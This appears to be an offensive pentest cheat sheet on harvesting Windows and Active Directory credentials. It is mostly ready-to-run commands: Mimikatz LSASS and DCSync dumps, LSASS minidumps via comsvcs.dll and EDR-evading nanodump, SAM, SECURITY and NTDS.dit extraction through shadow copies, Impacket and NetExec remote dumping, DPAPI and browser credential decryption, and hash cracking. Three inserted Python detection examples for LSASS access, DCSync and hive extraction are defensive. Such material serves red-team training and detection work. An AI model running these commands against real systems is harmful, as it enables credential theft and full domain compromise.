Credential Harvesting
Extract credentials from memory, disk, and AD itself. Covers Mimikatz, pypykatz, LSASS dumps, SAM/SYSTEM extraction, DPAPI, LSA secrets, cached domain creds, and DCSync.
You have local admin on a host (or Domain Admin on the domain). Time to harvest every credential you can find. Memory holds plaintext passwords and hashes, the registry stores local account hashes and LSA secrets, DPAPI protects saved credentials, and DCSync lets you pull hashes from the DC itself.
LSASS Memory Extraction
LSASS (Local Security Authority Subsystem Service) holds credentials for all users who have interactively logged on to the machine. Dump it and extract hashes, tickets, and sometimes plaintext passwords.
Mimikatz (On Target)
# Dump all credentials from LSASS
PS C:\> .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
# Dump NTLM hashes only
PS C:\> .\mimikatz.exe "privilege::debug" "sekurlsa::msv" "exit"
# Dump Kerberos tickets from memory
PS C:\> .\mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit"
# Dump wdigest (plaintext passwords, if enabled)
PS C:\> .\mimikatz.exe "privilege::debug" "sekurlsa::wdigest" "exit"
# Dump credential manager
PS C:\> .\mimikatz.exe "privilege::debug" "sekurlsa::credman" "exit"
HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential to 1 and wait for a user to log in.
LSASS Dump to File (Offline Extraction)
If you cannot run Mimikatz on the target, dump the LSASS process to a file and extract credentials offline.
# Task Manager: Right-click lsass.exe > Create dump file
# comsvcs.dll (built-in, works on most systems)
PS C:\> $lsass = (Get-Process lsass).Id
PS C:\> rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass C:\Temp\lsass.dmp full
# ProcDump (SysInternals - less likely to be flagged)
PS C:\> .\procdump.exe -accepteula -ma lsass.exe C:\Temp\lsass.dmp
# nanodump (creates a MiniDump with direct syscalls, evades most EDR)
PS C:\> .\nanodump.exe -w C:\Temp\lsass.dmp
# PPLdump (if LSASS is running as PPL)
PS C:\> .\PPLdump.exe lsass.exe C:\Temp\lsass.dmp
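Every technique in this section has to open a handle to lsass.exe, which is what Sysmon Event ID 10 (ProcessAccess) records. The following is an added detection example written for this page, not code from the page or from any tool it lists; the access-right bits are the Win32 constants, while the allowlist and the sample records are constructed assumptions.

```python
"""Added example (not from the page): flag LSASS memory access in Sysmon
Event ID 10 (ProcessAccess) records. The access-right bits are Win32
constants; the allowlist and the sample records are this example's own."""
PROCESS_VM_READ = 0x0010     # required to read credential material out of LSASS
PROCESS_DUP_HANDLE = 0x0040  # used by handle-duplication style dumpers

# Images that legitimately open LSASS on this estate (assumed allowlist, lowercase).
ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\programdata\microsoft\windows defender\platform\4.18\msmpeng.exe",
}

def parse_sysmon_message(text: str) -> dict:
    """Parse the 'Key: Value' lines of a Sysmon event message body."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(": ")
        if sep:
            fields[key.strip()] = value.strip()
    return fields

def is_lsass_access_suspicious(ev: dict) -> bool:
    """True when a non-allowlisted image opens lsass.exe with read or dup-handle rights."""
    if not ev.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return False
    if ev.get("SourceImage", "").lower() in ALLOWLIST:
        return False
    granted = int(ev.get("GrantedAccess", "0x0"), 16)
    return bool(granted & (PROCESS_VM_READ | PROCESS_DUP_HANDLE))

# Constructed Sysmon-style records (not real telemetry); paths and times are made up.
SAMPLE_EVENTS = [
    "UtcTime: 2024-05-01 10:00:00.000\nSourceImage: C:\\Windows\\System32\\rundll32.exe\n"
    "TargetImage: C:\\Windows\\System32\\lsass.exe\nGrantedAccess: 0x1FFFFF",
    "UtcTime: 2024-05-01 10:00:01.000\nSourceImage: C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18\\MsMpEng.exe\n"
    "TargetImage: C:\\Windows\\System32\\lsass.exe\nGrantedAccess: 0x1010",
    "UtcTime: 2024-05-01 10:00:02.000\nSourceImage: C:\\Users\\svc_backup\\Downloads\\procdump.exe\n"
    "TargetImage: C:\\Windows\\System32\\lsass.exe\nGrantedAccess: 0x1410",
    "UtcTime: 2024-05-01 10:00:03.000\nSourceImage: C:\\Windows\\System32\\svchost.exe\n"
    "TargetImage: C:\\Windows\\System32\\lsass.exe\nGrantedAccess: 0x1000",
]

def find_suspicious(messages) -> list:
    """SourceImage of every record that trips the rule, in log order."""
    parsed = [parse_sysmon_message(m) for m in messages]
    return [ev["SourceImage"] for ev in parsed if is_lsass_access_suspicious(ev)]

if __name__ == "__main__":
    for src in find_suspicious(SAMPLE_EVENTS):
        print("ALERT: lsass.exe opened with read/dup rights by", src)
```

Tune the allowlist from a baseline of your own hosts; anything not on it that requests PROCESS_VM_READ on LSASS is worth a look, whatever the tool is called.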
Offline Extraction with pypykatz
# Extract credentials from the dump on your attack box
root@localhost:~# pypykatz lsa minidump lsass.dmp
# Output to a file
root@localhost:~# pypykatz lsa minidump lsass.dmp -o creds.txt
# Parse only NTLM hashes
root@localhost:~# pypykatz lsa minidump lsass.dmp | grep -A2 "NT:"
Remote LSASS Dump via NetExec
# Dump LSASS remotely (requires local admin on target)
root@localhost:~# netexec smb 10.10.11.40 -u Administrator -p 'P@ssw0rd123' -M lsassy
# Dump using procdump method
root@localhost:~# netexec smb 10.10.11.40 -u Administrator -p 'P@ssw0rd123' -M procdump
# Dump using nanodump method
root@localhost:~# netexec smb 10.10.11.40 -u Administrator -p 'P@ssw0rd123' -M nanodump
# Dump using handlekatz
root@localhost:~# netexec smb 10.10.11.40 -u Administrator -p 'P@ssw0rd123' -M handlekatz
SAM and SYSTEM Registry Hives
The SAM database stores local account password hashes. The SYSTEM hive contains the boot key needed to decrypt them. You need both.
Extract from Running System
# reg save (requires admin)
PS C:\> reg save HKLM\SAM C:\Temp\SAM
PS C:\> reg save HKLM\SYSTEM C:\Temp\SYSTEM
PS C:\> reg save HKLM\SECURITY C:\Temp\SECURITY
Extract from Volume Shadow Copies
If you cannot modify the live registry, grab the hives from shadow copies.
# List shadow copies
PS C:\> vssadmin list shadows
# Copy from a shadow copy
PS C:\> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\Temp\SAM
PS C:\> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Temp\SYSTEM
PS C:\> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY C:\Temp\SECURITY
# Create a shadow copy if none exist
PS C:\> wmic shadowcopy call create Volume='C:\'
Dump Hashes Offline
# Impacket secretsdump (local hive extraction)
root@localhost:~# impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL
# Just SAM hashes
root@localhost:~# impacket-secretsdump -sam SAM -system SYSTEM LOCAL
Remote SAM Dump
# NetExec - dump SAM remotely
root@localhost:~# netexec smb 10.10.11.40 -u Administrator -p 'P@ssw0rd123' --sam
# Impacket secretsdump - remote
root@localhost:~# impacket-secretsdump corp.local/Administrator:'P@ssw0rd123'@10.10.11.40
# Impacket with hash
root@localhost:~# impacket-secretsdump corp.local/Administrator@10.10.11.40 -hashes :a3f1b9c2d4e5f6a7b8c9d0e1f2a3b4c5
LSA Secrets
LSA secrets store service account passwords, auto-logon credentials, VPN passwords, and other sensitive data in the SECURITY hive.
Extract Remotely
# Impacket secretsdump extracts LSA secrets automatically
root@localhost:~# impacket-secretsdump corp.local/Administrator:'P@ssw0rd123'@10.10.11.40
# NetExec
root@localhost:~# netexec smb 10.10.11.40 -u Administrator -p 'P@ssw0rd123' --lsa
Extract Locally with Mimikatz
PS C:\> .\mimikatz.exe "privilege::debug" "lsadump::secrets" "exit"
Cached Domain Credentials
Windows caches the last 10 domain logon credentials by default (DCC2/mscache2 format). These work even when the DC is unreachable.
Extract
# Impacket secretsdump - extracts cached creds from SECURITY hive
root@localhost:~# impacket-secretsdump corp.local/Administrator:'P@ssw0rd123'@10.10.11.40
# NetExec
root@localhost:~# netexec smb 10.10.11.40 -u Administrator -p 'P@ssw0rd123' --lsa
# Mimikatz
PS C:\> .\mimikatz.exe "privilege::debug" "lsadump::cache" "exit"
Crack DCC2 Hashes
DCC2 hashes are slow to crack. They use 10,240 rounds of PBKDF2.
# Hashcat mode 2100 (DCC2/mscache2)
root@localhost:~# hashcat -m 2100 dcc2_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# John the Ripper
root@localhost:~# john --format=mscash2 --wordlist=/usr/share/wordlists/rockyou.txt dcc2_hashes.txt
DPAPI Credential Extraction
DPAPI (Data Protection API) protects credentials saved in Chrome, Edge, RDP connection manager, Wi-Fi passwords, Windows Credential Manager, and more. The master key is tied to the user’s password.
Mimikatz DPAPI
# List Credential Manager vaults
PS C:\> .\mimikatz.exe "vault::list" "exit"
# Enumerate credential files
PS C:\> .\mimikatz.exe "dpapi::cred /in:C:\Users\svc_backup\AppData\Local\Microsoft\Credentials\*" "exit"
# Dump DPAPI master keys (needs SYSTEM or domain backup key)
PS C:\> .\mimikatz.exe "privilege::debug" "sekurlsa::dpapi" "exit"
# Decrypt a credential blob with the master key
PS C:\> .\mimikatz.exe "dpapi::cred /in:C:\Users\svc_backup\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D /masterkey:abc123..." "exit"
SharpDPAPI
# Triage all DPAPI credentials accessible to current user
PS C:\> .\SharpDPAPI.exe triage
# Dump Chrome credentials
PS C:\> .\SharpDPAPI.exe chrome /unprotect
# Dump all credentials using domain backup key (Domain Admin required)
PS C:\> .\SharpDPAPI.exe credentials /mkfile:masterkeys.txt
# Machine credential triage
PS C:\> .\SharpDPAPI.exe machinetriage
Remote DPAPI with Impacket
# dpapi.py - extract DPAPI secrets remotely
root@localhost:~# impacket-dpapi corp.local/Administrator:'P@ssw0rd123'@10.10.11.40 masterkey
root@localhost:~# impacket-dpapi corp.local/Administrator:'P@ssw0rd123'@10.10.11.40 credential
# DonPAPI - automated DPAPI credential extraction
root@localhost:~# DonPAPI corp.local/Administrator:'P@ssw0rd123'@10.10.11.40
# NetExec DPAPI module
root@localhost:~# netexec smb 10.10.11.40 -u Administrator -p 'P@ssw0rd123' -M dpapi
lsadump::backupkeys /system:dc01.corp.local /export once you have Domain Admin.
NTDS.dit Extraction
NTDS.dit is the AD database. It contains every user’s NTLM hash, Kerberos keys, and password history for the entire domain. Extracting it is the ultimate credential harvest.
DCSync (Remote, No File Copy)
DCSync simulates a domain controller replication request. You need DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights on the domain object (Domain Admins and Enterprise Admins have these by default).
# Dump a specific account
root@localhost:~# impacket-secretsdump corp.local/Administrator:'P@ssw0rd123'@10.10.11.35 -just-dc-user Administrator
# Dump all accounts
root@localhost:~# impacket-secretsdump corp.local/Administrator:'P@ssw0rd123'@10.10.11.35 -just-dc
# DCSync with NTLM hash
root@localhost:~# impacket-secretsdump corp.local/Administrator@10.10.11.35 -hashes :a3f1b9c2d4e5f6a7b8c9d0e1f2a3b4c5 -just-dc
# DCSync with Kerberos ticket
root@localhost:~# export KRB5CCNAME=/tmp/Administrator.ccache
root@localhost:~# impacket-secretsdump corp.local/Administrator@dc01.corp.local -k -no-pass -just-dc
# NetExec
root@localhost:~# netexec smb 10.10.11.35 -u Administrator -p 'P@ssw0rd123' --ntds
# Mimikatz DCSync
PS C:\> .\mimikatz.exe "lsadump::dcsync /domain:corp.local /user:Administrator" "exit"
# Dump all users
PS C:\> .\mimikatz.exe "lsadump::dcsync /domain:corp.local /all /csv" "exit"
# Dump the krbtgt hash (needed for Golden Ticket)
PS C:\> .\mimikatz.exe "lsadump::dcsync /domain:corp.local /user:krbtgt" "exit"
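Because DCSync exercises the two replication rights named above, a DC with "Audit Directory Service Access" enabled logs each request as Security Event ID 4662. The following is an added detection example written for this page, not code from the page or from any tool it lists; the three GUIDs are the well-known AD replication extended rights, while the allowed-account set and the sample records are constructed assumptions.

```python
"""Added example (not from the page): detect DCSync-style replication
requests in Windows Security Event ID 4662 records. The three GUIDs are
the well-known AD replication extended rights; the allowed-account set and
the sample records are this example's assumptions."""
from dataclasses import dataclass

REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100  # AccessMask bit set when an extended right is exercised

# Principals expected to replicate: DC machine accounts plus the AAD Connect
# sync account (assumed names; take them from your own environment).
ALLOWED_REPLICATORS = {"DC01$", "DC02$", "MSOL_sync"}

@dataclass
class Alert:
    account: str
    rights: list

def check_4662(ev: dict):
    """Alert when an unexpected principal exercises a replication right, else None."""
    if ev.get("EventID") != 4662:
        return None
    if not (int(ev.get("AccessMask", "0x0"), 16) & CONTROL_ACCESS):
        return None
    props = ev.get("Properties", "").lower()
    rights = sorted(name for guid, name in REPLICATION_RIGHTS.items() if guid in props)
    if not rights or ev.get("SubjectUserName", "") in ALLOWED_REPLICATORS:
        return None
    return Alert(ev.get("SubjectUserName", ""), rights)

def scan(events) -> list:
    """All alerts for a batch of events, in log order."""
    return [a for a in map(check_4662, events) if a is not None]

# Constructed 4662 records (not real logs); the last GUID is a made-up placeholder.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC02$", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "svc_backup", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "AccessMask": "0x100",
     "Properties": "{aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee}"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"ALERT: {alert.account} requested {', '.join(alert.rights)}")
```

The same rule is the place to catch an account that was quietly granted the replication rights: any non-DC principal that trips it deserves a review of the domain object's ACL.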
NTDS.dit Physical Extraction
If you have admin access on the DC but DCSync is blocked (network restrictions, etc.), grab the file directly.
# ntdsutil (Microsoft's official tool)
PS C:\> ntdsutil "activate instance ntds" "ifm" "create full C:\Temp\ntds_dump" quit quit
# Volume Shadow Copy method
PS C:\> vssadmin create shadow /for=C:
PS C:\> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\ntds.dit C:\Temp\ntds.dit
PS C:\> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SYSTEM C:\Temp\SYSTEM
# esentutl (copy locked files)
PS C:\> esentutl.exe /y /vss C:\Windows\NTDS\ntds.dit /d C:\Temp\ntds.dit
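The hive and NTDS.dit steps above (reg save of SAM/SYSTEM/SECURITY, shadow-copy creation and reads, ntdsutil IFM, esentutl /vss) all leave distinctive process command lines in Event 4688 or Sysmon Event 1. The following is an added detection example for those three sections, not code from the page or from any product; the patterns and the sample records are this example's own.

```python
"""Added example (not from the page): command-line detections for the on-host
hive and NTDS.dit extraction steps above (reg save of SAM/SYSTEM/SECURITY,
shadow-copy creation and reads, ntdsutil IFM, esentutl /vss). Patterns and
sample records are this example's own, not from any product."""
import re

RULES = {
    "hive_reg_save":         r"\breg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b",
    "shadow_copy_create":    r"vssadmin.*\bcreate\s+shadow|wmic\s+shadowcopy\s+call\s+create",
    "shadow_copy_hive_read": r"harddiskvolumeshadowcopy\d+\\.*(\\config\\(sam|system|security)|ntds\.dit)\b",
    "ntds_ntdsutil_ifm":     r"ntdsutil.*\bifm\b",
    "ntds_esentutl_vss":     r"esentutl.*/vss.*ntds\.dit",
}
COMPILED = {name: re.compile(pat, re.IGNORECASE) for name, pat in RULES.items()}

def match_rules(command_line: str) -> list:
    """Names of every rule whose pattern occurs in the process command line."""
    return [name for name, rx in COMPILED.items() if rx.search(command_line)]

# Constructed process-creation records (Event 4688 / Sysmon Event 1 style).
SAMPLE_EVENTS = [
    {"User": r"CORP\svc_backup", "CommandLine": r"reg save HKLM\SAM C:\Temp\SAM"},
    {"User": r"CORP\svc_backup", "CommandLine": r"wmic shadowcopy call create Volume='C:\'"},
    {"User": r"CORP\svc_backup", "CommandLine": r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Temp\SYSTEM"},
    {"User": r"CORP\dcadmin", "CommandLine": r'ntdsutil "activate instance ntds" "ifm" "create full C:\Temp\ntds_dump" quit quit'},
    {"User": r"CORP\dcadmin", "CommandLine": r"esentutl.exe /y /vss C:\Windows\NTDS\ntds.dit /d C:\Temp\ntds.dit"},
    {"User": r"NT AUTHORITY\SYSTEM", "CommandLine": r"reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion"},
]

def scan(events) -> list:
    """(User, CommandLine, matched rule names) for each record that trips a rule."""
    hits = []
    for ev in events:
        names = match_rules(ev["CommandLine"])
        if names:
            hits.append((ev["User"], ev["CommandLine"], names))
    return hits

if __name__ == "__main__":
    for user, cmd, names in scan(SAMPLE_EVENTS):
        print(f"ALERT [{', '.join(names)}] {user}: {cmd}")
```

Backup software does create shadow copies and run ntdsutil IFM on DCs, so pair the rule with the account and parent process before paging anyone.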
Extract Hashes from NTDS.dit Offline
# Impacket secretsdump (offline)
root@localhost:~# impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
# With password history
root@localhost:~# impacket-secretsdump -ntds ntds.dit -system SYSTEM -history LOCAL
# Output user:hash pairs for pass-the-hash
root@localhost:~# impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL -outputfile ntds_hashes
Windows Credential Manager and Vault
Windows Credential Manager stores saved credentials for RDP, SMB, web logins, and scheduled tasks.
# List saved credentials
PS C:\> cmdkey /list
# PowerShell vault query
PS C:\> [Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
PS C:\> (New-Object Windows.Security.Credentials.PasswordVault).RetrieveAll() | ForEach-Object { $_.RetrievePassword(); $_ } | Select-Object UserName, Password, Resource
# Mimikatz vault dump
PS C:\> .\mimikatz.exe "vault::cred /patch" "exit"